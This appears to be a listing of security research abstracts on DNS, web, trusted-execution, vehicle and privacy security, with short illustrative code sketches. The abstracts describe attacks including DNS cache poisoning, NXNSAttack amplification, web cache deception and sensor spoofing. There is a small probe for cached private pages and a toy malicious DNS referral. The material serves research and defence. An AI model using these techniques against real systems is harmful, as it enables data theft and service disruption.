In today’s DNS infrastructure, DNS forwarders are devices standing in between DNS clients and recursive resolvers. The devices often serve as ingress servers for DNS clients, and instead of resolving queries, they pass the DNS requests to other servers. Because of their advantages in several use cases, DNS forwarders are widely deployed and queried by Internet users. However, studies have shown that DNS forwarders can be among the more vulnerable devices in the DNS infrastructure.

In this paper, we present a cache poisoning attack targeting DNS forwarders. Through this attack, attackers can inject rogue records of arbitrary victim domain names using a controlled domain, and circumvent widely-deployed cache poisoning defences. By performing tests on popular home router models and DNS software, we find several vulnerable implementations, including those of large vendors (e.g., D-Link, Linksys, dnsmasq and MS DNS). Further, through a nationwide measurement, we estimate the population of Chinese mobile clients which are using vulnerable DNS forwarders. We have been reporting the issue to the affected vendors, and so far have received positive feedback from three of them. Our work further demonstrates that DNS forwarders can be a soft spot in the DNS infrastructure, and calls for attention as well as implementation guidelines from the community.
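
One of the defenses that vulnerable forwarders skip is the classic bailiwick check: only cache records whose owner names fall under the zone the answering server is responsible for. A minimal sketch of such a check:

```python
# A record may be cached only if its owner name lies inside the answering
# server's zone ("bailiwick"). Simplified; real resolvers check more than this.
def in_bailiwick(record_name, zone):
    record_name, zone = record_name.rstrip(".").lower(), zone.rstrip(".").lower()
    return record_name == zone or record_name.endswith("." + zone)

# An answer from the attacker-controlled zone tries to smuggle in a record for
# the victim's domain; the check rejects it.
assert in_bailiwick("www.attacker.example", "attacker.example")
assert not in_bailiwick("victim.example", "attacker.example")
```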

Programmable In-Network Security for Context-aware BYOD Policies

Bring Your Own Device (BYOD) has become the new norm for enterprise networks, but BYOD security remains a top concern. Context-aware security, which enforces access control based on dynamic runtime context, is a promising approach. Recent work has developed SDN solutions to collect device contexts and enforce access control at a central controller. However, the central controller could become a bottleneck and attack target. Processing context signals at the remote controller is also too slow for real-time decision change.

We present a new paradigm, programmable in-network security (Poise), which is enabled by the emergence of programmable switches. At the heart of Poise is a novel security primitive, which can be programmed to support a wide range of context-aware policies in hardware. Users of Poise specify concise policies, and Poise compiles them into different configurations of the primitive in P4. Compared with traditional SDN defenses, Poise is resilient to control plane saturation attacks, and it dramatically increases defense agility.

A Longitudinal and Comprehensive Study of the DANE Ecosystem in Email

The DNS-based Authentication of Named Entities (DANE) standard allows clients and servers to establish a TLS connection without relying on trusted third parties like CAs by publishing TLSA records. DANE uses the Domain Name System Security Extensions (DNSSEC) PKI to achieve integrity and authenticity. However, DANE can only work correctly if each principal in its PKI properly performs its duty: through their DNSSEC-aware DNS servers, DANE servers (e.g., SMTP servers) must publish their TLSA records, which are consistent with their certificates. Similarly, DANE clients (e.g., SMTP clients) must verify the DANE servers’ TLSA records, which are also used to validate the fetched certificates.

DANE is rapidly gaining popularity in the email ecosystem, to help improve transport security between mail servers. Yet its security benefits hinge on deploying DANE correctly. In this paper we perform a large-scale, longitudinal, and comprehensive measurement study on how well the DANE standard and its relevant protocols are deployed and managed. We collect data for all second-level domains under the .com, .net, .org, .nl, and .se TLDs over a period of 24 months to analyze server-side deployment and management. To analyze client-side deployment and management, we investigate 29 popular email service providers, as well as four popular MTA and ten DNS software implementations.

Our study reveals pervasive mismanagement in the DANE ecosystem. For instance, we found that 36% of TLSA records cannot be validated due to missing or incorrect DNSSEC records, and 14.17% of them are inconsistent with their certificates. We also found that only four email service providers support DANE for both outgoing and incoming emails, but two of them do not check the Certificate Usage field in TLSA records. On the bright side, the administrators of email servers can leverage open source MTA and DNS programs to support DANE correctly.
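
For reference, the core TLSA matching step (RFC 6698) is small; the sketch below handles selector 0 (the full certificate) with matching types 0/1/2. Selector 1 (SubjectPublicKeyInfo) additionally needs an X.509 parser, and the TLSA record itself (e.g., the RRset at _25._tcp.mail.example.com) must come from a DNSSEC-validated lookup, both omitted here.

```python
# TLSA "certificate association" matching for selector 0 (full certificate).
import hashlib

def tlsa_matches(der_cert, selector, mtype, assoc_data):
    if selector != 0:
        raise NotImplementedError("selector 1 (SPKI) needs an X.509 parser")
    if mtype == 0:                    # exact match of the certificate
        return der_cert == assoc_data
    if mtype == 1:                    # SHA-256 of the certificate
        return hashlib.sha256(der_cert).digest() == assoc_data
    if mtype == 2:                    # SHA-512 of the certificate
        return hashlib.sha512(der_cert).digest() == assoc_data
    return False

cert = b"0\x82..."  # DER certificate as presented in the TLS handshake (dummy bytes)
assert tlsa_matches(cert, 0, 1, hashlib.sha256(cert).digest())
```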

NXNSAttack: Recursive DNS Inefficiencies and Vulnerabilities

This paper exposes a new vulnerability and introduces a corresponding attack, the NoneXistent Name Server Attack (NXNSAttack), that disrupts and may paralyze the DNS system, making it difficult or impossible for Internet users to access websites, web e-mail, online video chats, or any other online resource. The NXNSAttack generates a storm of packets between DNS resolvers and DNS authoritative name servers. The storm is produced by the response of resolvers to unrestricted referral response messages of authoritative name servers. The attack is significantly more destructive than NXDomain attacks (e.g., the Mirai attack): i) It reaches an amplification factor of more than 1620x on the number of packets exchanged by the recursive resolver. ii) In addition to the negative cache, the attack also saturates the ‘NS’ section of the resolver caches. To mitigate the attack impact, we propose an enhancement to the recursive resolver algorithm, MaxFetch(k), that prevents unnecessary proactive fetches. We implemented the MaxFetch(1) mitigation enhancement on a BIND resolver and tested it on real-world DNS query datasets. Our results show that MaxFetch(1) degrades neither the recursive resolver throughput nor its latency. Following the discovery of the attack, a responsible disclosure procedure was carried out, and several DNS vendors and public providers have issued a CVE and patched their systems.
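
A toy view of the amplification and the fix: one malicious referral carries dozens of glue-less NS names under the victim’s zone; a naive resolver immediately resolves all of them, whereas MaxFetch(k) proactively fetches at most k and falls back to more only if those fail.

```python
# Every referred name below is glue-less and lives under the victim's zone, so
# each one costs the resolver (and the victim's name servers) extra lookups.
def proactive_fetches(referred_ns, k=None):
    return referred_ns if k is None else referred_ns[:k]

referral = [f"fake{i}.victim.example" for i in range(40)]   # one attacker referral
print(len(proactive_fetches(referral)))        # naive resolver: 40 extra queries
print(len(proactive_fetches(referral, k=1)))   # MaxFetch(1): a single query
```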

Web Security and Privacy

Shim Shimmeny: Evaluating the Security and Privacy Contributions of Link Shimming in the Modern Web

Link shimming (also known as URL wrapping) is a technique widely used by websites, where URLs on a site are rewritten to direct link navigations to an intermediary endpoint before redirecting to the original destination. This “shimming” of URL clicks can serve navigation security, privacy, and analytics purposes, and has been deployed by prominent websites (e.g., Facebook, Twitter, Microsoft, Google) for over a decade. Yet, we lack a deep understanding of its purported security and privacy contributions, particularly in today’s web ecosystem, where modern browsers provide potential alternative mechanisms for protecting link navigations without link shimming’s costs.

In this paper, we provide a large-scale empirical evaluation of link shimming’s security and privacy contributions, using Facebook’s real-world deployment as a case study. Our results indicate that even in the modern web, link shimming can provide meaningful security and privacy benefits to users broadly. These benefits are most notable for the sizable populations that we observed with a high prevalence of legacy browser clients, such as in mobile-centric developing countries. We discuss the tradeoff of these gains against potential costs. Beyond link shimming, our findings also provide insights for advancing user online protection, such as on the web ecosystem’s distribution of responsibility, legacy software scenarios, and user responses to website security warnings.
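
A minimal sketch of how such a shim endpoint can work (my reconstruction, not Facebook’s implementation): outbound URLs are rewritten to an intermediary carrying the destination plus an HMAC, which is verified on click before a blocklist check and the final redirect. The endpoint, key, and blocklist are hypothetical.

```python
# Hypothetical link shim: HMAC-protected intermediary redirect endpoint.
import hashlib, hmac
from urllib.parse import parse_qs, quote, urlparse

KEY = b"server-side-secret"
BLOCKLIST = {"evil.example"}

def shim(url):
    tag = hmac.new(KEY, url.encode(), hashlib.sha256).hexdigest()[:16]
    return f"https://l.example/l.php?u={quote(url, safe='')}&h={tag}"

def follow(shim_url):
    q = parse_qs(urlparse(shim_url).query)
    url, tag = q["u"][0], q["h"][0]
    expected = hmac.new(KEY, url.encode(), hashlib.sha256).hexdigest()[:16]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("forged shim link (open-redirect attempt)")
    if urlparse(url).hostname in BLOCKLIST:
        return "https://l.example/warning"   # interstitial instead of the redirect
    return url                               # 302 to the real destination

assert follow(shim("https://good.example/a")) == "https://good.example/a"
```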

Cached and Confused: Web Cache Deception in the Wild

Web cache deception (WCD) is an attack proposed in 2017, where an attacker tricks a caching proxy into erroneously storing private information transmitted over the Internet and subsequently gains unauthorized access to that cached data. Due to the widespread use of web caches and, in particular, the use of massive networks of caching proxies deployed by content distribution network (CDN) providers as a critical component of the Internet, WCD puts a substantial population of Internet users at risk.

We present the first large-scale study that quantifies the prevalence of WCD in 340 high-profile sites among the Alexa Top 5K. Our analysis reveals WCD vulnerabilities that leak private user data as well as secret authentication and authorization tokens that can be leveraged by an attacker to mount damaging web application attacks. Furthermore, we explore WCD in a scientific framework as an instance of the path confusion class of attacks, and demonstrate that variations on the path confusion technique used make it possible to exploit sites that are otherwise not impacted by the original attack. Our findings show that many popular sites remain vulnerable two years after the public disclosure of WCD.

Our empirical experiments with popular CDN providers underline the fact that web caches are not plug & play technologies. In order to mitigate WCD, site operators must adopt a holistic view of their web infrastructure and carefully configure cache settings appropriate for their applications.
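
The basic detection methodology can be sketched in a few lines: fetch an authenticated page under a path-confused URL with a static-looking extension, then refetch it without credentials and look for a private marker in the cached copy. The URLs, cookie, and marker below are hypothetical, and this is a measurement probe against one’s own site, not an exploit.

```python
# Web-cache-deception probe using the third-party requests library.
import requests

def wcd_probe(page, session_cookie, marker):
    confused = page.rstrip("/") + "/nonexistent.css"   # path confusion + "static" extension
    requests.get(confused, cookies=session_cookie)     # the victim's visit primes the cache
    public = requests.get(confused)                    # the attacker's cookie-less refetch
    return marker in public.text                       # private content served from cache?

if wcd_probe("https://site.example/account", {"session": "..."}, "victim@mail.example"):
    print("potential web cache deception")
```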

A Tale of Two Headers: A Formal Analysis of Inconsistent Click-Jacking Protection on the Web

Click-jacking protection on the modern Web is commonly enforced via client-side security mechanisms for framing control, like the X-Frame-Options header (XFO) and Content Security Policy (CSP). Though these client-side security mechanisms are certainly useful and successful, delegating protection to web browsers opens room for inconsistencies in the security guarantees offered to users of different browsers. In particular, inconsistencies might arise due to the lack of support for CSP and the different implementations of the underspecified XFO header. In this paper, we formally study the problem of inconsistencies in framing control policies across different browsers and we implement an automated policy analyzer based on our theory, which we use to assess the state of click-jacking protection on the Web. Our analysis shows that 10% of the (distinct) framing control policies in the wild are inconsistent and most often do not provide any level of protection to at least one browser. We thus propose recommendations for web developers and browser vendors to mitigate this issue. Finally, we design and implement a server-side proxy to retrofit security in web applications.
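
A much-simplified flavor of such a consistency check, flagging three policy patterns that protect users of one browser but not another. Real browser semantics, and the paper’s formal model, are considerably subtler than these heuristics.

```python
# Heuristic framing-control consistency checks, in the spirit of the analyzer.
def framing_inconsistencies(xfo, csp_frame_ancestors):
    issues = []
    if xfo and "," in xfo:
        issues.append("multiple XFO values: browsers parse the list differently")
    if xfo and xfo.strip().upper().startswith("ALLOW-FROM"):
        issues.append("ALLOW-FROM is ignored by Chrome/Safari, leaving those users unprotected")
    if csp_frame_ancestors and not xfo:
        issues.append("CSP-only policy: browsers without frame-ancestors support get no protection")
    return issues

for issue in framing_inconsistencies("SAMEORIGIN, DENY", None):
    print("inconsistent:", issue)
```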

Retrofitting Fine Grain Isolation in the Firefox Renderer

Firefox and other major browsers rely on dozens of third-party libraries to render audio, video, images, and other content. These libraries are a frequent source of vulnerabilities. To mitigate this threat, we are migrating Firefox to an architecture that isolates these libraries in lightweight sandboxes, dramatically reducing the impact of a compromise.

Retrofitting isolation can be labor-intensive, very prone to security bugs, and requires critical attention to performance. To help, we developed RLBox, a framework that minimizes the burden of converting Firefox to securely and efficiently use untrusted code. To enable this, RLBox employs static information flow enforcement, and lightweight dynamic checks, expressed directly in the C++ type system.

RLBox supports efficient sandboxing through either software-based fault isolation or multi-core process isolation. Performance overheads are modest and transient, and have only minor impact on page latency. We demonstrate this by sandboxing performance-sensitive image decoding libraries (libjpeg and libpng), video decoding libraries (libtheora and libvpx), the libvorbis audio decoding library, and the zlib decompression library.

RLBox, using a WebAssembly sandbox, has been integrated into production Firefox to sandbox the libGraphite font shaping library.

Zero-delay Lightweight Defenses against Website Fingerprinting

Website Fingerprinting (WF) attacks threaten user privacy on anonymity networks because they can be used by network surveillants to identify the webpage being visited by extracting features from network traffic. A number of defenses have been put forward to mitigate the threat of WF, but they are flawed: some have been defeated by stronger WF attacks, some are too expensive in overhead, while others are impractical to deploy.

In this work, we propose two novel zero-delay lightweight defenses, FRONT and GLUE. We find that WF attacks rely on the feature-rich trace front, so FRONT focuses on obfuscating the trace front with dummy packets. It also randomizes the number and distribution of dummy packets for trace-to-trace randomness to impede the attacker’s learning process. GLUE adds dummy packets between separate traces so that they appear to the attacker as a long consecutive trace, rendering the attacker unable to find their start or end points, let alone classify them. Our experiments show that with 33% data overhead, FRONT outperforms the best known lightweight defense, WTF-PAD, which has a similar data overhead. With around 22%–44% data overhead, GLUE can lower the accuracy and precision of the best WF attacks to a degree comparable with the best heavyweight defenses. Both defenses have no latency overhead.
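
A sketch of the front-loaded padding idea as I read it: per trace, sample a random padding budget and a random window, then draw dummy-packet timestamps from a Rayleigh distribution so the padding concentrates at the feature-rich trace front. Parameter names and values are illustrative, not the paper’s exact configuration.

```python
# FRONT-style padding schedule: per-trace random budget and window, with
# Rayleigh-distributed dummy timestamps (Rayleigh(w) == Weibull(w*sqrt(2), 2)).
import random

def front_padding_schedule(n_max=1700, w_min=1.0, w_max=14.0):
    n = random.randint(1, n_max)        # trace-to-trace randomness in padding volume
    w = random.uniform(w_min, w_max)    # per-trace padding window (Rayleigh scale), seconds
    return sorted(random.weibullvariate(w * 2 ** 0.5, 2) for _ in range(n))

sched = front_padding_schedule()
print(f"{len(sched)} dummies, {sum(t < 5 for t in sched)} within the first 5 s")
```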

Achieving Keyless CDNs with Conclaves

Content Delivery Networks (CDNs) serve a large and increasing portion of today’s web content. Beyond caching, CDNs provide their customers with a variety of services, including protection against DDoS and targeted attacks. As the web shifts from HTTP to HTTPS, CDNs continue to provide such services by also assuming control of their customers’ private keys, thereby breaking a fundamental security principle: private keys must only be known by their owner.

We present the design and implementation of Phoenix, the first truly “keyless CDN”. Phoenix uses secure enclaves (in particular Intel SGX) to host web content, store sensitive key material, apply web application firewalls, and more on otherwise untrusted machines. To support scalability and multitenancy, Phoenix is built around a new architectural primitive which we call conclaves: containers of enclaves. Conclaves make it straightforward to deploy multi-process, scalable, legacy applications. We also develop a filesystem to extend the enclave’s security guarantees to untrusted storage. In its strongest configuration, Phoenix reduces the knowledge of the edge server to that of a traditional on-path HTTPS adversary. We evaluate the performance of Phoenix with a series of micro- and macro-benchmarks.

Trusted Execution Environments 2

SENG, the SGX-Enforcing Network Gateway: Authorizing Communication from Shielded Clients

Network administrators face a security-critical dilemma. While they want to tightly contain their hosts, they usually have to relax firewall policies to support a large variety of applications. However, liberal policies like this enable data exfiltration by unknown (and untrusted) client applications. An inability to attribute communication accurately and reliably to applications is at the heart of this problem. Firewall policies are restricted to coarse-grained features that are easy to evade and mimic, such as protocols or port numbers.

We present SENG, a network gateway that enables firewalls to reliably attribute traffic to an application. SENG shields an application in an SGX-tailored LibOS and transparently establishes an attestation-based DTLS channel between the SGX enclave and the central network gateway. Consequently, administrators can perfectly attribute traffic to its originating application, and thereby enforce fine-grained per-application communication policies at a central firewall. Our prototype implementation demonstrates that SENG (i) allows administrators to readily use their favorite firewall to enforce network policies on a certified per-application basis and (ii) prevents local system-level attackers from interfering with the shielded application’s communication.

APEX: A Verified Architecture for Proofs of Execution on Remote Devices under Full Software Compromise

Modern society is increasingly surrounded by, and is growing accustomed to, a wide range of Cyber-Physical Systems (CPS), Internet-of-Things (IoT), and smart devices. They often perform safety-critical functions, e.g., personal medical devices, automotive CPS as well as industrial and residential automation, e.g., sensor-alarm combinations. On the lower end of the scale, these devices are small, cheap and specialized sensors and/or actuators. They tend to host small anemic CPUs, have small amounts of memory and run simple software. If such devices are left unprotected, consequences of forged sensor readings or ignored actuation commands can be catastrophic, particularly, in safety-critical settings. This prompts the following three questions: (1) How to trust data produced, or verify that commands were performed, by a simple remote embedded device?, (2) How to bind these actions/results to the execution of expected software? and, (3) Can (1) and (2) be attained even if all software on a device can be modified and/or compromised?

In this paper we answer these questions by designing, demonstrating security of, and formally verifying, APEX: an Architecture for Provable Execution. To the best of our knowledge, this is the first of its kind result for low-end embedded systems. Our work has a range of applications, especially, authenticated sensing and trustworthy actuation, which are increasingly relevant in the context of safety-critical systems. APEX is publicly available and our evaluation shows that it incurs low overhead, affordable even for very low-end embedded devices, e.g., those based on TI MSP430 or AVR ATmega processors.

PARTEMU: Enabling Dynamic Analysis of Real-World TrustZone Software Using Emulation

ARM’s TrustZone technology is the basis for security of billions of devices worldwide, including Android smartphones and IoT devices. Because TrustZone has access to sensitive information such as cryptographic keys, access to TrustZone has been locked down on real-world devices: only code that is authenticated by a trusted party can run in TrustZone. A side-effect is that TrustZone software cannot be instrumented or monitored. Thus, recent advances in dynamic analysis techniques such as feedback-driven fuzz testing have not been applied to TrustZone software. To address the above problem, this work builds an emulator that runs four widely-used, real-world TrustZone operating systems (TZOSes) - Qualcomm’s QSEE, Trustonic’s Kinibi, Samsung’s TEEGRIS, and Linaro’s OP-TEE - and the trusted applications (TAs) that run on them. The traditional challenge for this approach is that the emulation effort required is often impractical. However, we find that TZOSes depend only on a limited subset of hardware and software components. By carefully choosing a subset of components to emulate, we find we are able to make the effort practical. We implement our emulation on PARTEMU, a modular framework we develop on QEMU and PANDA. We show the utility of PARTEMU by integrating feedback-driven fuzz-testing using AFL and use it to perform a large-scale study of 194 unique TAs from 12 different Android smartphone vendors and a leading IoT vendor, finding previously unknown vulnerabilities in 48 TAs, several of which are exploitable. We identify patterns of developer mistakes unique to TrustZone development that cause some of these vulnerabilities, highlighting the need for TrustZone-specific developer education. We also demonstrate using PARTEMU to test the QSEE TZOS itself, finding crashes in code paths that would not normally be exercised on a real device. Our work shows that dynamic analysis of real-world TrustZone software through emulation is both feasible and beneficial.

PHMon: A Programmable Hardware Monitor and Its Security Use Cases

There has been a resurgent trend in the industry to enforce a variety of security policies in hardware. The current trend for developing dedicated hardware security extensions is an imperfect, lengthy, and costly process. In contrast to this trend, a flexible hardware monitor can efficiently enforce and enhance a variety of security policies as security threats evolve. Existing hardware monitors typically suffer from one (or more) of the following drawbacks: a restricted set of monitoring actions, considerable performance and power overheads, or an invasive design. In this paper, we propose a minimally-invasive and efficient implementation of a Programmable Hardware Monitor (PHMon) with expressive monitoring rules and flexible fine-grained actions. PHMon can enforce a variety of security policies and can also assist with detecting software bugs and security vulnerabilities. Our prototype of PHMon on an FPGA includes the hardware monitor and its interface with a RISC-V Rocket processor as well as a complete Linux software stack. We demonstrate the versatility of PHMon and its ease of adoption through four different use cases: a shadow stack, a hardware-accelerated fuzzing engine, an information leak prevention mechanism, and a hardware-accelerated debugger. Our prototype implementation of PHMon incurs 0.9% performance overhead on average, while the hardware-accelerated fuzzing engine improves fuzzing performance on average by 16× over the state-of-the-art software-based implementation. Our ASIC implementation of PHMon only incurs a 5% power overhead and a 13.5% area overhead.

Horizontal Privilege Escalation in Trusted Applications

Trusted Execution Environments (TEEs) use hardware-based isolation to guard sensitive data from conventional monolithic OSes. While such isolation strengthens security guarantees, it also introduces a semantic gap between the TEE on the one side and the conventional OS and applications on the other. In this work, we studied the impact of this semantic gap on the handling of sensitive data by Trusted Applications (TAs) running in popular TEEs. We found that the combination of two properties, (i) multi-tenancy and (ii) statefulness, in TAs leads to vulnerabilities of Horizontal Privilege Escalation (HPE). These vulnerabilities leaked sensitive session data or provided cryptographic oracles without requiring code execution vulnerabilities in TEE logic. We identified 19 HPE vulnerabilities present across 95 TAs running on three major ARM TrustZone-based trusted OSes. Our results showed that HPE attacks can be used to decrypt DRM protected content, to forge attestations, and to obtain cryptographic keys under all three evaluated OSes. Here, we present HOOPER, an automatic symbolic-execution-based scanner for HPE vulnerabilities, which aids manual analysis and dramatically reduces overall analysis time. In particular, on the Teegris trusted OS, HOOPER identifies 19 out of 24 HPE-based attack flows in 24 hours, compared with our original manual analysis time of approximately four weeks.

TeeRex: Discovery and Exploitation of Memory Corruption Vulnerabilities in SGX Enclaves

Intel’s Software Guard Extensions (SGX) introduced new instructions to switch the processor to enclave mode which protects it from introspection. While the enclave mode strongly protects the memory and the state of the processor, it cannot withstand memory corruption errors inside the enclave code. In this paper, we show that the attack surface of SGX enclaves provides new challenges for enclave developers as exploitable memory corruption vulnerabilities are easily introduced into enclave code. We develop TeeRex to automatically analyze enclave binary code for vulnerabilities introduced at the host-to-enclave boundary by means of symbolic execution. Our evaluation on public enclave binaries reveals that many of them suffer from memory corruption errors allowing an attacker to corrupt function pointers or perform arbitrary memory writes. As we will show, TeeRex features a specifically tailored framework for SGX enclaves that allows simple proof-of-concept exploit construction to assess the discovered vulnerabilities. Our findings reveal vulnerabilities in multiple enclaves, including enclaves developed by Intel, Baidu, and WolfSSL, as well as biometric fingerprint software deployed on popular laptop brands.
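
The bug class TeeRex hunts for, in miniature: an ECALL receives a pointer from the untrusted host, and the enclave must verify that the entire buffer lies outside enclave memory before dereferencing it. The addresses below are made up.

```python
# The classic host-to-enclave pointer check that vulnerable enclaves forget.
ENCLAVE_BASE, ENCLAVE_SIZE = 0x10_0000, 0x4_0000

def outside_enclave(ptr, length):
    # The whole [ptr, ptr+length) range must avoid enclave memory.
    return ptr + length <= ENCLAVE_BASE or ptr >= ENCLAVE_BASE + ENCLAVE_SIZE

assert outside_enclave(0x20_0000, 64)
assert not outside_enclave(0x10_0010, 64)   # points into the enclave: reject
```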

Automotive and Drone Security

Stealthy Tracking of Autonomous Vehicles with Cache Side Channels

Autonomous vehicles are becoming increasingly popular, but their reliance on computer systems to sense and operate in the physical world introduces new security risks. In this paper, we show that the location privacy of an autonomous vehicle may be compromised by software side-channel attacks if localization software shares a hardware platform with an attack program. In particular, we demonstrate that a cache side-channel attack can be used to infer the route or the location of a vehicle that runs the adaptive Monte-Carlo localization (AMCL) algorithm. The main contributions of the paper are as follows. First, we show that adaptive behaviors of perception and control algorithms may introduce new side-channel vulnerabilities that reveal the physical properties of a vehicle or its environment. Second, we introduce statistical learning models that infer the AMCL algorithm’s state from cache access patterns and predict the route or the location of a vehicle from the trace of the AMCL state. Third, we implement and demonstrate the attack on a realistic software stack using real-world sensor data recorded on city roads. Our findings suggest that autonomous driving software needs strong timing-channel protection for location privacy.

Towards Robust LiDAR-based Perception in Autonomous Driving: General Black-box Adversarial Sensor Attack and Countermeasures

Perception plays a pivotal role in autonomous driving systems, which utilizes onboard sensors like cameras and LiDARs (Light Detection and Ranging) to assess surroundings. Recent studies have demonstrated that LiDAR-based perception is vulnerable to spoofing attacks, in which adversaries spoof a fake vehicle in front of a victim self-driving car by strategically transmitting laser signals to the victim’s LiDAR sensor. However, existing attacks suffer from effectiveness and generality limitations. In this work, we perform the first study to explore the general vulnerability of current LiDAR-based perception architectures and discover that the ignored occlusion patterns in LiDAR point clouds make self-driving cars vulnerable to spoofing attacks. We construct the first black-box spoofing attack based on our identified vulnerability, which universally achieves around 80% mean success rates on all target models. We perform the first defense study, proposing CARLO to mitigate LiDAR spoofing attacks. CARLO detects spoofed data by treating ignored occlusion patterns as invariant physical features, which reduces the mean attack success rate to 5.5%. Meanwhile, we take the first step towards exploring a general architecture for robust LiDAR-based perception, and propose SVF that embeds the neglected physical features into end-to-end learning. SVF further reduces the mean attack success rate to around 2.3%.

SAVIOR: Securing Autonomous Vehicles with Robust Physical Invariants

Autonomous Vehicles (AVs), including aerial, sea, and ground vehicles, assess their environment with a variety of sensors and actuators that allow them to perform specific tasks such as navigating a route, hovering, or avoiding collisions. So far, AVs tend to trust the information provided by their sensors to make navigation decisions without data validation or verification, and therefore, attackers can exploit these limitations by feeding erroneous sensor data with the intention of disrupting or taking control of the system. In this paper we introduce SAVIOR: an architecture for securing autonomous vehicles with robust physical invariants. We implement and validate our proposal on two popular open-source controllers for aerial and ground vehicles, and demonstrate its effectiveness.
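
A toy of the physical-invariant idea: predict the next sensor reading from a simple motion model and run CUSUM over the residuals, so that persistent low-magnitude spoofing accumulates into an alarm even when each individual reading looks plausible. All numbers are illustrative; SAVIOR’s models and thresholds are vehicle-specific.

```python
# CUSUM residual detector over model-predicted vs. measured sensor values.
def cusum_detect(measured, predicted, drift=0.05, threshold=1.0):
    s = 0.0
    for t, (m, p) in enumerate(zip(measured, predicted)):
        s = max(0.0, s + abs(m - p) - drift)   # residuals above `drift` accumulate
        if s > threshold:
            return t                            # alarm time
    return None

model = [0.1 * t for t in range(50)]                                # predicted velocity
honest = [v + 0.02 for v in model]                                  # sensor noise only
spoofed = [v + (0.15 if t > 20 else 0.02) for t, v in enumerate(model)]
print(cusum_detect(honest, model), cusum_detect(spoofed, model))    # None and ~31
```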

From Control Model to Program: Investigating Robotic Aerial Vehicle Accidents with MAYDAY

As robotic aerial vehicles (RAVs) see wide adoption, accidents involving them occur increasingly often, calling for in-depth investigation. Unfortunately, an inquiry into “why did my drone crash” often goes nowhere if the root cause lies in the RAV’s control program, due to the key challenges in evidence and methodology: (1) Current RAVs’ flight log only records high-level vehicle control states and events, without recording control program execution; (2) The capability of “connecting the dots” – from controller anomaly to program variable corruption to program bug location – is lacking. To address these challenges, we develop MAYDAY, a cross-domain post-accident investigation framework by mapping control model to control program, enabling (1) in-flight logging of control program execution, and (2) traceback to the control-semantic bug that led to an accident, based on control- and program-level logs. We have applied MAYDAY to ArduPilot, a popular open-source RAV control program that runs on a wide range of commodity RAVs. Our investigation of 10 RAV accidents caused by real ArduPilot bugs demonstrates that MAYDAY is able to pinpoint the root causes of these accidents within the program with high accuracy and minimal runtime and storage overhead. We also found that 4 recently patched bugs remained exploitable and alerted the ArduPilot team.

Drift with Devil: Security of Multi-Sensor Fusion based Localization in High-Level Autonomous Driving under GPS Spoofing

For high-level Autonomous Vehicles (AV), localization is highly security and safety critical. One direct threat to it is GPS spoofing, but fortunately, AV systems today predominantly use Multi-Sensor Fusion (MSF) algorithms that are generally believed to have the potential to practically defeat GPS spoofing. However, no prior work has studied whether today’s MSF algorithms are indeed sufficiently secure under GPS spoofing, especially in AV settings. In this work, we perform the first study to fill this critical gap. As the first study, we focus on a production-grade MSF with both design and implementation level representativeness, and identify two AV-specific attack goals, off-road and wrong-way attacks.

To systematically understand the security property, we first analyze the upper-bound attack effectiveness, and discover a take-over effect that can fundamentally defeat the MSF design principle. We perform a cause analysis and find that such vulnerability only appears dynamically and non-deterministically. Leveraging this insight, we design FusionRipper, a novel and general attack that opportunistically captures and exploits take-over vulnerabilities. We evaluate it on 6 real-world sensor traces, and find that FusionRipper can achieve at least 97% and 91.3% success rates in all traces for off-road and wrong-way attacks respectively. We also find that it is highly robust to practical factors such as spoofing inaccuracies. To improve the practicality, we further design an offline method that can effectively identify attack parameters with over 80% average success rates for both attack goals, with the cost of at most half a day. We also discuss promising defense directions.

Plug-N-Pwned: Comprehensive Vulnerability Analysis of OBD-II Dongles as A New Over-the-Air Attack Surface in Automotive IoT

With the growing trend of the Internet of Things, a large number of wireless OBD-II dongles have been developed, which can be simply plugged into vehicles to enable remote functions such as sophisticated vehicle control and status monitoring. However, since these dongles are directly connected with in-vehicle networks, they may open a new over-the-air attack surface for vehicles. In this paper, we conduct the first comprehensive security analysis on all wireless OBD-II dongles available on Amazon in the US in February 2019, which were 77 in total. To systematically perform the analysis, we design and implement an automated tool DongleScope that dynamically tests these dongles from all possible attack stages on a real automobile. With DongleScope, we have identified 5 different types of vulnerabilities, with 4 being newly discovered. Our results reveal that each of the 77 dongles exposes at least two types of these vulnerabilities, which indicates a widespread vulnerability exposure among wireless OBD-II dongles on the market today. To demonstrate the severity, we further construct 4 classes of concrete attacks with a variety of practical implications such as privacy leakage, property theft, and even safety threats. We also discuss the root causes and feasible countermeasures, and have made corresponding responsible disclosure.

Privacy Enhancing Technologies

PCKV: Locally Differentially Private Correlated Key-Value Data Collection with Optimized Utility

Data collection under local differential privacy (LDP) has been mostly studied for homogeneous data. Real-world applications often involve a mixture of different data types such as key-value pairs, where the frequency of keys and mean of values under each key must be estimated simultaneously. For key-value data collection with LDP, it is challenging to achieve a good utility-privacy tradeoff since the data contains two dimensions and a user may possess multiple key-value pairs. There is also an inherent correlation between key and values which if not harnessed, will lead to poor utility. In this paper, we propose a locally differentially private key-value data collection framework that utilizes correlated perturbations to enhance utility. We instantiate our framework by two protocols PCKV-UE (based on Unary Encoding) and PCKV-GRR (based on Generalized Randomized Response), where we design an advanced Padding-and-Sampling mechanism and an improved mean estimator which is non-interactive. Due to our correlated key and value perturbation mechanisms, the composed privacy budget is shown to be less than that of independent perturbation of key and value, which enables us to further optimize the perturbation parameters via budget allocation. Experimental results on both synthetic and real-world datasets show that our proposed protocols achieve better utility for both frequency and mean estimations under the same LDP guarantees than state-of-the-art mechanisms.
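
Two of the building blocks named in the abstract can be sketched directly: discretizing a value in [-1, 1] to {-1, +1} so that its mean survives randomization, and Generalized Randomized Response (GRR) over the key domain. The actual PCKV-GRR correlates the key and value perturbations and adds Padding-and-Sampling, which this sketch omits.

```python
# LDP building blocks: unbiased value discretization plus GRR over keys.
import math, random

def discretize(v):                       # E[discretize(v)] == v for v in [-1, 1]
    return 1 if random.random() < (1 + v) / 2 else -1

def grr(key, domain, eps):               # report the true key w.p. e^eps/(e^eps+d-1)
    d = len(domain)
    p = math.exp(eps) / (math.exp(eps) + d - 1)
    if random.random() < p:
        return key
    return random.choice([k for k in domain if k != key])

domain = [f"k{i}" for i in range(10)]
print(grr("k3", domain, eps=1.0), discretize(0.7))
```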

Actions Speak Louder than Words: Entity-Sensitive Privacy Policy and Data Flow Analysis with PoliCheck

